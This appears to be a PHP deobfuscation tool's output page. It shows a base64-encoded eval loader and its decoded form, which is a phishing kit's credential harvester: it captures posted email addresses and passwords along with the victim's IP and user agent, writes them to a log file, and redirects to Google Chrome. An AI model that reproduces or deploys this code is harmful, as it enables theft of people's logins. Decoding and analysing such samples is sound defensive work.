Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval("?>".base64_decode("PD9waHANCiRpcCA9IGdldGVudigiUkVNT1RFX0FERFIiKTsNCiRlbWFpbGl..
Decoded Output download
?>b'<?php
$ip = getenv("REMOTE_ADDR");
$emailid = $_POST[\'emailid\'];
$password = $_POST[\'pwd\'];
$web = $_SERVER["HTTP_HOST"];
$jesseinj = $_SERVER["REQUEST_URI"];
$jesseagent = $_SERVER["HTTP_USER_AGENT"];
$date = date(DATE_RFC1123);
$msg = "
<HTML>
<BODY>
<TABLE>
###################################################################
------------------- DESIGNED BY JBOIJAY87 ------------------------
--------------------CORRUPTED SYSTEM INFO-------------------------
----------------- $emailid\'s LOGZZ ----------------
Received by: $date
-------------------------------------------------------------------
Email ID :($emailid)
-------------------------------------------------------------------
PASSWORD :($password)
-------------------------------------------------------------------
-------------------------------------------------------------------
I.P ADDRESS: ($ip)
IP: <img src=\'http://api.hostip.info/flag.php?ip=$ip\' height=\'12\' /> <a href=\'http://whoer.net/check?host=$ip\' target=\'_blank\'>$ip</a> /
https://sso.dhl-usa.com/sso/login_main.asp?nav=Login
-------------------------------------------------------------------
-------------------------------------------------------------------
REQUEST URI: $web$jesseinj
-------------------------------------------------------------------
-------------------------------------------------------------------
USER AGENT: $jesseagent ...
-------------------------------------------------------------------
Host Name: $web
-------------------------------------------------------------------
-------------------------CORRUPTED SYSTEM INFO---------------------
------------------------------ V.7.7.7 ----------------------------
-------------------------------------------------------------------
###################################################################
</TABLE>
</BODY>
</HTML>
";
$jesse = fopen("Logzzz.txt", "a");
fwrite($jesse, $msg);
fwrite($jesse, "rn");
fclose($jesse);
if(isset ($jesse)){
echo "<script type=\'text/javascript\'>
self.Close();
</script>";}
header("location: https://www.google.com/chrome/?brand=CHBD&gclid=CjwKCAjwoKDXBRAAEiwA4xnqv1sSLkxA0XIdHWXCm2GEOQNKoZu8DedjdOMwKCT7TQvMlEDEJQYWuhoCW9wQAvD_BwE&gclsrc=aw.ds&dclid=CK-Yg5C_5NoCFVFi0wodfKQHQw");
?>
'Did this file decode correctly?
Original Code
<?php eval("?>".base64_decode("PD9waHANCiRpcCA9IGdldGVudigiUkVNT1RFX0FERFIiKTsNCiRlbWFpbGlkID0gJF9QT1NUWydlbWFpbGlkJ107DQokcGFzc3dvcmQgPSAkX1BPU1RbJ3B3ZCddOw0KJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRqZXNzZWluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KJGplc3NlYWdlbnQgPSAkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07DQokZGF0ZSA9IGRhdGUoREFURV9SRkMxMTIzKTsNCiRtc2cgPSAiIA0KPEhUTUw+DQo8Qk9EWT4NCjxUQUJMRT4NCiAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIA0KDQogLS0tLS0tLS0tLS0tLS0tLS0tLSBERVNJR05FRCBCWSBKQk9JSkFZODcgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQogLS0tLS0tLS0tLS0tLS0tLS0tLS1DT1JSVVBURUQgU1lTVEVNIElORk8tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQogLS0tLS0tLS0tLS0tLS0tLS0gJGVtYWlsaWQncyBMT0daWiAtLS0tLS0tLS0tLS0tLS0tDQoJCQkJUmVjZWl2ZWQgYnk6ICRkYXRlIA0KIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiAgICAgICAgICAgICAgICAgICAgIEVtYWlsIElEIDooJGVtYWlsaWQpICANCiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQogICAgICAgICAgICAgICAgICAgICBQQVNTV09SRCA6KCRwYXNzd29yZCkNCiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIA0KIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0gIA0KICAgICAgICAgICAgICAgICAgICAgSS5QIEFERFJFU1M6ICgkaXApDQoJCQkJCSANCklQOiA8aW1nIHNyYz0naHR0cDovL2FwaS5ob3N0aXAuaW5mby9mbGFnLnBocD9pcD0kaXAnIGhlaWdodD0nMTInIC8+IDxhIGhyZWY9J2h0dHA6Ly93aG9lci5uZXQvY2hlY2s/aG9zdD0kaXAnIHRhcmdldD0nX2JsYW5rJz4kaXA8L2E+IC8NCgkJCQkJICAgaHR0cHM6Ly9zc28uZGhsLXVzYS5jb20vc3NvL2xvZ2luX21haW4uYXNwP25hdj1Mb2dpbg0KIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQogIFJFUVVFU1QgVVJJOiAkd2ViJGplc3NlaW5qDQogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiBVU0VSIEFHRU5UOiAkamVzc2VhZ2VudCAuLi4gIA0KIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0gDQogICAgICAgICAgICAgICAgICAgICBIb3N0IE5hbWU6ICR3ZWINCiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLUNPUlJVUFRFRCBTWVNURU0gSU5GTy0tLS0tLS0tLS0tLS0tLS0tLS0tLSAgDQogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIFYuNy43LjcgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSAgDQogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSAgICAgICAgICANCiAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQo8L1RBQkxFPg0KPC9CT0RZPg0KPC9IVE1MPg0KICI7DQoNCiRqZXNzZSA9IGZvcGVuKCJMb2d6enoudHh0IiwgImEiKTsgDQpmd3JpdGUoJGplc3NlLCAkbXNnKTsNCmZ3cml0ZSgkamVzc2UsICJybiIpOw0KZmNsb3NlKCRqZXNzZSk7DQoNCmlmKGlzc2V0ICgkamVzc2UpKXsNCmVjaG8gIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0Jz4NCnNlbGYuQ2xvc2UoKTsNCjwvc2NyaXB0PiI7fQ0KaGVhZGVyKCJsb2NhdGlvbjogaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9jaHJvbWUvP2JyYW5kPUNIQkQmZ2NsaWQ9Q2p3S0NBandvS0RYQlJBQUVpd0E0eG5xdjFzU0xreEEwWElkSFdYQ20yR0VPUU5Lb1p1OERlZGpkT013S0NUN1RRdk1sRURFSlFZV3Vob0NXOXdRQXZEX0J3RSZnY2xzcmM9YXcuZHMmZGNsaWQ9Q0stWWc1Q181Tm9DRlZGaTB3b2RmS1FIUXciKTsNCg0KPz4NCg0K")); ?>Function Calls
| base64_decode | 1 |
Stats
| MD5 | afaa7fe05d6771b04a8c06b0f5cfd1d1 |
| Eval Count | 1 |
| Decode Time | 92 ms |